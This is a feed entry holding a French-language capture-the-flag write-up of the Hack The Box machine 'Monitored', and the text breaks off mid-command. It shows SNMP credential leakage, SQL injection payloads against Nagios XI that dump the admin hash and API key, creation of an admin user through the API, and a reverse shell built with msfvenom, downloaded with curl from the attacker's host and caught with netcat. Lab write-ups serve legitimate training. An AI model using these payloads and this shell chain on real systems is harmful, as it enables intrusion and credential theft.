Medium on sl0wguy's Bloghttps://leopoldabgn.github.io/writeups/tags/medium/Recent content in Medium on sl0wguy's BlogHugo -- gohugo.ioen-usWed, 12 Nov 2025 00:00:00 +0000HTB | Monitoredhttps://leopoldabgn.github.io/writeups/p/monitored-htb/Wed, 12 Nov 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/monitored-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Monitored cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Monitored</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.248</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">svc : XjH7VCehowpR1xZB </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap-tcp">nmap TCP </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.248 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 8.4p1 Debian 5+deb11u3 <span class="o">(</span>protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">3072</span> 61e2e7b41b5d46dc3b2f9138e66dc5ff <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABg </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 2973c5a58daa3f60a94aa3e59f675c93 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBbeArqg4dgxZEFQzd3zpod1RYGUH6Jfz6tcQjHsVTvRNnUzqx5nc7gK2kUUo1HxbEAH+cPziFjNJc6q7vvpzt4<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 6d7af9eb8e45c2026ad58d4db3a3376f <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB5o+WJqnyLpmJtLyPL+tEUTFbjMZkx3jUUFqejioAj7 </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.56 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to https://nagios.monitored.htb/ </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.56 <span class="o">(</span>Debian<span class="o">)</span> </span></span><span class="line"><span class="cl">389/tcp open ldap syn-ack ttl <span class="m">63</span> OpenLDAP 2.2.X - 2.3.X </span></span><span class="line"><span class="cl">443/tcp open ssl/http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.56 <span class="o">((</span>Debian<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Nagios XI </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>nagios.monitored.htb/organizationName<span class="o">=</span>Monitored/stateOrProvinceName<span class="o">=</span>Dorset/countryName<span class="o">=</span>UK/emailAddress<span class="o">=</span>support@monitored.htb/localityName<span class="o">=</span>Bournemouth </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>nagios.monitored.htb/organizationName<span class="o">=</span>Monitored/stateOrProvinceName<span class="o">=</span>Dorset/countryName<span class="o">=</span>UK/emailAddress<span class="o">=</span>support@monitored.htb/localityName<span class="o">=</span>Bournemouth </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa10.10.11.248 </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2023-11-11T21:46:55 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2297-08-25T21:46:55 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: b36a55607a5f047d983864504d67cfe0 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 610938448c36b08b0ae8a132971c8e89cfac2b5b </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> MIID/zCCAuegAwIBAgIUVhOvMcK6dv/Kvzplbf6IxOePX3EwDQYJKoZIhvcNAQEL </span></span><span class="line"><span class="cl"><span class="p">|</span> 4c8NpU/6egay1sl2ZrQuO8feYA<span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.56 <span class="o">(</span>Debian<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: TLS randomness does not represent <span class="nb">time</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> tls-alpn: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ http/1.1 </span></span><span class="line"><span class="cl">5667/tcp open tcpwrapped syn-ack ttl <span class="m">63</span> </span></span><span class="line"><span class="cl">No exact OS matches <span class="k">for</span> host <span class="o">(</span>If you know what OS is running on it, see https://nmap.org/submit/ <span class="o">)</span>. </span></span><span class="line"><span class="cl">TCP/IP fingerprint: </span></span><span class="line"><span class="cl">OS:SCAN<span class="o">(</span><span class="nv">V</span><span class="o">=</span>7.93%E<span class="o">=</span>4%D<span class="o">=</span>11/10%OT<span class="o">=</span>22%CT<span class="o">=</span>1%CU<span class="o">=</span>37179%PV<span class="o">=</span>Y%DS<span class="o">=</span>2%DC<span class="o">=</span>T%G<span class="o">=</span>Y%TM<span class="o">=</span><span class="m">691219</span> </span></span><span class="line"><span class="cl">OS:%RUCK<span class="o">=</span>G%RUD<span class="o">=</span>G<span class="o">)</span>IE<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DFI<span class="o">=</span>N%T<span class="o">=</span>40%CD<span class="o">=</span>S<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="snmp">SNMP </h3><p>Avec un scan nmap sur les ports <strong>UDP</strong>, on comprend que le port <strong>SNMP</strong> est ouvert. Avec <strong>nmap</strong>, on effectue plusieurs commandes SNMP et on trouve des credentials:</p> <ul> <li>svc / &ldquo;XjH7VCehowpR1xZB&rdquo;</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -vv --reason -Pn -T4 -sU -sV -p <span class="m">161</span> --script<span class="o">=</span><span class="s2">&#34;banner,(snmp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)&#34;</span> -oN <span class="s2">&#34;/opt/my-resources/setup/zsh/results/10.10.11.248/scans/udp161/udp_161_snmp-nmap.txt&#34;</span> -oX <span class="s2">&#34;/opt/my-resources/setup/zsh/results/10.10.11.248/scans/udp161/xml/udp_161_snmp_nmap.xml&#34;</span> 10.10.11.248 </span></span><span class="line"><span class="cl"><span class="p">|</span> 631: </span></span><span class="line"><span class="cl"><span class="p">|</span> Name: sh </span></span><span class="line"><span class="cl"><span class="p">|</span> Path: /bin/sh </span></span><span class="line"><span class="cl"><span class="p">|</span> Params: -c sleep 30<span class="p">;</span> sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB </span></span></code></pre></td></tr></table> </div> </div><h3 id="nagios-xi---cannot-login">Nagios XI - Cannot login </h3><p>Le user/pass ne fonctionne pas &ldquo;The specified user account has been disabled or does not exist.&rdquo;</p> <h3 id="sql-injection">SQL Injection </h3><p>En cherchant sur internet, on trouve la CVE suivante (que l&rsquo;on teste à l&rsquo;aveugle car on ne connait pas la version de Nagios XI qui est installée) : <strong>CVE-2023-40931</strong></p> <p>A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to <strong>/nagiosxi/admin/banner_message-ajaxhelper.php</strong></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: nagios.monitored.htb </span></span><span class="line"><span class="cl">Cookie: <span class="nv">nagiosxi</span><span class="o">=</span>lmeogjafdeiommcbnhu1k7s9lh </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Ubuntu<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:144.0<span class="o">)</span> Gecko/20100101 Firefox/144.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: fr,fr-FR<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8,en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.3 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span><span class="line"><span class="cl">Te: trailers </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: <span class="m">204</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">action</span><span class="o">=</span>acknowledge_banner_message<span class="p">&amp;</span><span class="nv">token</span><span class="o">=</span>9f86697945abf56d35a7ee14233bef5b481a51be<span class="p">&amp;</span><span class="nv">id</span><span class="o">=</span>3+OR+<span class="o">(</span>SELECT+7402+FROM<span class="o">(</span>SELECT+COUNT<span class="o">(</span>*<span class="o">)</span>,CONCAT<span class="o">(</span>@@version,FLOOR<span class="o">(</span>RAND<span class="o">(</span>0<span class="o">)</span>*2<span class="o">))</span>x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x<span class="o">)</span>a<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">----------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> &lt;p&gt;&lt;pre&gt;SQL Error <span class="o">[</span>nagiosxi<span class="o">]</span> : Duplicate entry <span class="s1">&#39;10.5.23-MariaDB-0+deb11u11&#39;</span> <span class="k">for</span> key <span class="s1">&#39;group_key&#39;</span>&lt;/pre&gt;&lt;/p&gt; </span></span><span class="line"><span class="cl"><span class="o">{</span><span class="s2">&#34;message&#34;</span>:<span class="s2">&#34;Failed to acknowledge message.&#34;</span>,<span class="s2">&#34;msg_type&#34;</span>:<span class="s2">&#34;error&#34;</span><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>On récupère le hachage Admin, que l&rsquo;on ne réussit pas à déchiffrer.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nv">action</span><span class="o">=</span>acknowledge_banner_message<span class="p">&amp;</span><span class="nv">token</span><span class="o">=</span>9f86697945abf56d35a7ee14233bef5b481a51be<span class="p">&amp;</span><span class="nv">id</span><span class="o">=</span>3+OR+<span class="o">(</span>SELECT+7402+FROM<span class="o">(</span>SELECT+COUNT<span class="o">(</span>*<span class="o">)</span>,CONCAT<span class="o">((</span><span class="k">select</span>+username+from+xi_users+LIMIT+1<span class="o">)</span>,FLOOR<span class="o">(</span>RAND<span class="o">(</span>0<span class="o">)</span>*2<span class="o">))</span>x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x<span class="o">)</span>a<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&gt;&gt;&gt; SQL Error <span class="o">[</span>nagiosxi<span class="o">]</span> : Duplicate entry <span class="s1">&#39;nagiosadmin1&#39;</span> <span class="k">for</span> key <span class="s1">&#39;group_key&#39;</span> <span class="c1"># --&gt; nagiosadmin (le &#34;1&#34; est raouté par FLOOR(...))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">action</span><span class="o">=</span>acknowledge_banner_message<span class="p">&amp;</span><span class="nv">token</span><span class="o">=</span>9f86697945abf56d35a7ee14233bef5b481a51be<span class="p">&amp;</span><span class="nv">id</span><span class="o">=</span>3+OR+<span class="o">(</span>SELECT+7402+FROM<span class="o">(</span>SELECT+COUNT<span class="o">(</span>*<span class="o">)</span>,CONCAT<span class="o">((</span><span class="k">select</span>+password+from+xi_users+LIMIT+1<span class="o">)</span>,FLOOR<span class="o">(</span>RAND<span class="o">(</span>0<span class="o">)</span>*2<span class="o">))</span>x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x<span class="o">)</span>a<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&gt;&gt;&gt; SQL Error <span class="o">[</span>nagiosxi<span class="o">]</span> : Duplicate entry <span class="s1">&#39;$2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C1&#39;</span> <span class="k">for</span> key <span class="s1">&#39;group_key&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><p>J&rsquo;ai tenté de bruteforce le hash mais ça n&rsquo;a pas fonctionné : j&rsquo;avais oublié que chaque résultat de requete SQL rajoutait un &ldquo;1&rdquo; à la fin&hellip; Donc mon hash était en vérité:</p> <blockquote> <p>$2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C &lt;&mdash;- sans la 1 !! (Mais ça n&rsquo;a pas fonctionné de toute manière)</p> </blockquote> <p><code>xi_users</code> table:</p> <blockquote> <p>user_id, username, password, name, email, backend_ticket, enabled, api_key, api_enabled, login_attempts, last_attempt, last_password_change, last_login, last_edited, &hellip;</p> </blockquote> <p>J&rsquo;ai récupérer les colonnes de la table xi_users en utilisant ce type de requêtes :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="k">select</span> COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where <span class="nv">table_name</span><span class="o">=</span><span class="s1">&#39;xi_users&#39;</span> limit <span class="m">1</span> </span></span><span class="line"><span class="cl"><span class="k">select</span> COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where <span class="nv">table_name</span><span class="o">=</span><span class="s1">&#39;xi_users&#39;</span> limit 1,1 </span></span><span class="line"><span class="cl"><span class="k">select</span> COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where <span class="nv">table_name</span><span class="o">=</span><span class="s1">&#39;xi_users&#39;</span> limit 2,1 </span></span><span class="line"><span class="cl"><span class="k">select</span> COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where <span class="nv">table_name</span><span class="o">=</span><span class="s1">&#39;xi_users&#39;</span> limit 3,1 </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>On réussi à récupérer la clé API de l&rsquo;administateur :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># If you have &#34;...&#34; because your string is very long</span> </span></span><span class="line"><span class="cl"><span class="k">select</span> api_key from xi_users limit <span class="m">1</span> </span></span><span class="line"><span class="cl">&gt;&gt;&gt; <span class="s1">&#39;IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9C...&#39;</span> </span></span><span class="line"><span class="cl"><span class="c1"># You can use SUBSTRING multiple times to dump the string</span> </span></span><span class="line"><span class="cl"><span class="k">select</span> SUBSTRING<span class="o">(</span>api_key, 1, 10<span class="o">)</span> from xi_users limit <span class="m">1</span> </span></span></code></pre></td></tr></table> </div> </div><blockquote> <p>IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL</p> </blockquote> <p>En récupérant les requête API utilisé sur une autre exploit disponible (récente), j&rsquo;ai pu créer un nouvel utilisateur Administrateur :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">POST /nagiosxi/api/v1/system/user?apikey<span class="o">=</span>IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL<span class="p">&amp;</span><span class="nv">pretty</span><span class="o">=</span><span class="m">1</span> HTTP/1.1 </span></span><span class="line"><span class="cl">Host: 10.10.11.248 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">username</span><span class="o">=</span>Lu6Wk<span class="p">&amp;</span><span class="nv">password</span><span class="o">=</span>DxMkC<span class="p">&amp;</span><span class="nv">name</span><span class="o">=</span>Lu6Wk<span class="p">&amp;</span><span class="nv">email</span><span class="o">=</span>Lu6Wk%40mail.com<span class="p">&amp;</span><span class="nv">auth_level</span><span class="o">=</span>admin </span></span></code></pre></td></tr></table> </div> </div><p>On peut alors ensuite se connecter sur l&rsquo;interface graphique de nagios XI avec ce nouvel utilisateur et créer des commandes sur cette page :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">GET /nagiosxi/includes/components/ccm/index.php?cmd<span class="o">=</span>view<span class="p">&amp;</span><span class="nv">type</span><span class="o">=</span>command<span class="p">&amp;</span><span class="nv">page</span><span class="o">=</span><span class="m">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">https://nagios.monitored.htb/nagiosxi/includes/components/ccm/index.php?cmd<span class="o">=</span>modify<span class="p">&amp;</span><span class="nv">type</span><span class="o">=</span>command<span class="p">&amp;</span><span class="nv">id</span><span class="o">=</span>158<span class="p">&amp;</span><span class="nv">page</span><span class="o">=</span>1<span class="p">&amp;</span><span class="nv">returnUrl</span><span class="o">=</span>index.php%3Fcmd%3Dview%26type%3Dcommand%26page%3D1 </span></span><span class="line"><span class="cl">&gt;&gt;&gt; Command Line : cat user.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">GET /nagiosxi/includes/components/nagioscorecfg/applyconfig.php </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">GET /nagiosxi/includes/components/ccm/command_test.php?cmd<span class="o">=</span>test<span class="p">&amp;</span><span class="nv">mode</span><span class="o">=</span>test<span class="p">&amp;</span><span class="nv">cid</span><span class="o">=</span>158<span class="p">&amp;</span><span class="nv">nsp</span><span class="o">=</span>443df18d3ff18d83e02a7bb13fc42870f7b73046851cecd9e301897d427f8a5e HTTP/1.1 </span></span><span class="line"><span class="cl">Host: nagios.monitored.htb </span></span><span class="line"><span class="cl">User-Agent: python-requests/2.32.4 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Accept: */* </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: <span class="nv">nagiosxi</span><span class="o">=</span>8pi6o9q2kph72ugu230v9vjq2g </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; </span></span><span class="line"><span class="cl">HTTP/1.1 <span class="m">200</span> OK </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"><span class="o">[</span>nagios@monitored ~<span class="o">]</span>$ cat user.txt </span></span><span class="line"><span class="cl">213b4331f50e5f1072d301938db28331 </span></span></code></pre></td></tr></table> </div> </div><h3 id="stable-shell">Stable Shell </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># Reverse Shell Linux ELF</span> </span></span><span class="line"><span class="cl">$ msfvenom -p linux/x64/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.14.14 <span class="nv">LPORT</span><span class="o">=</span><span class="m">1337</span> -f elf &gt; shell </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> No platform was selected, choosing Msf::Module::Platform::Linux from the payload </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> No arch selected, selecting arch: x64 from the payload </span></span><span class="line"><span class="cl">No encoder specified, outputting raw payload </span></span><span class="line"><span class="cl">Payload size: <span class="m">74</span> bytes </span></span><span class="line"><span class="cl">Final size of elf file: <span class="m">194</span> bytes </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ http-server <span class="m">80</span> </span></span><span class="line"><span class="cl">Serving HTTP on 0.0.0.0 port <span class="m">80</span> <span class="o">(</span>http://0.0.0.0:80/<span class="o">)</span> ... </span></span><span class="line"><span class="cl">10.10.11.248 - - <span class="o">[</span>11/Nov/2025 19:58:51<span class="o">]</span> <span class="s2">&#34;GET /shell HTTP/1.1&#34;</span> <span class="m">200</span> - </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Through Burp, I executed <span class="m">3</span> commands in a row : </span></span><span class="line"><span class="cl">- curl http://10.10.14.14/shell -O shell </span></span><span class="line"><span class="cl">- chmod <span class="m">777</span> shell </span></span><span class="line"><span class="cl">- ./shell </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::1337 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:1337 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.248. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.248:53330. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">python3 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span 